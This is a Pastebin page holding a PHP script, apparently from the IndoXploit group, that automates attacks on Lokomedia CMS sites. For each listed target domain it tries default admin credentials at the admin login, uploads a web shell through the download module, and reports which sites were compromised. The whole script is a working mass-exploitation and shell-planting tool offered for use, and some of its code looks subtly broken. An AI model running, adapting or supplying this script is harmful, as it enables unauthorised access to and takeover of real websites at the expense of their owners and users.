AgusSR

Lokomedia Auto Tanem Shell by IndoXploit

Apr 18th, 2016
3,944
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. // indoxploit
  3. function cek($url) {
  4.     $ch = curl_init($url);
  5.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  6.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  7.     $res = curl_exec($ch);
  8.           curl_close($ch);
  9.     return $res;
  10. }
  11. function curl($url,$payload) {
  12.     $ch = curl_init($url);
  13.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  14.           curl_setopt($ch, CURLOPT_POST, true);
  15.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  16.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  17.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  18.           curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  19.     $res = curl_exec($ch);
  20.           curl_close($ch);
  21.     return $res;
  22. }
  23. echo "<center>
  24.     <h1>Lokomedia Auto Tanem Shell</h1>
  25.     <form method='post'>
  26.     Domain: <br>
  27.     <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 250px;'></textarea><br>
  28.     <input type='submit' name='hajar' value='Xploit!'>
  29.     </form>";
  30. if($_POST['hajar']) {
  31.     $domain = explode("\r\n", $_POST['url']);
  32.     $up = array(
  33.         "admin" => "admin",
  34.         "admin" => "123456",
  35.         "indoxploit" => "indoxploit",
  36.         );
  37.     foreach($domain as $url) {
  38.         foreach($up as $user => $pass) {
  39.             $data1 = array(
  40.                 "username" => $user,
  41.                 "password" => $pass,
  42.                 );
  43.             $login = curl($url."/adminweb/cek_login.php", $data1);
  44.             if(preg_match("/Logout|Administrator/", $login)) {
  45.                 $file = "shellmu.php"; //1 dir dengan exploiternyaa
  46.                 $data2 = array(
  47.                     "judul" => "indoxploit auto exploiter lokomedia",
  48.                     "fupload" => "@$file",
  49.                     "upload" => " &nbsp;&nbsp;&nbsp;&nbsp; Simpan &nbsp;&nbsp;&nbsp;&nbsp;",
  50.                     );
  51.                 $ngirim = curl($url."/adminweb/modul/mod_download/aksi_download.php?module=download&act=input",$data);
  52.                 if(preg_match("/indoxploit auto exploiter lokomedia/i", $ngirim)) {
  53.                     echo "[+] $url -> <font color=green>sukses login [ user: $user pass: $pass ]</font><br>";
  54.                     $cek = cek("$url/files/image.php");
  55.                     if(preg_match("/indoXploit/", $cek)) {
  56.                         echo "[+] $url/files/image.php -> <font color=green>shelmu.</font><br><br>";
  57.                     } else {
  58.                         echo "[-] <font color='#bb0000'>shellmu gaada.</font><br><br>";
  59.                     }
  60.                 }
  61.             } else {
  62.                 echo "[-] $url -> gagal login<br><br>";
  63.             }
  64.         }
  65.     }
  66. }
RAW Paste Data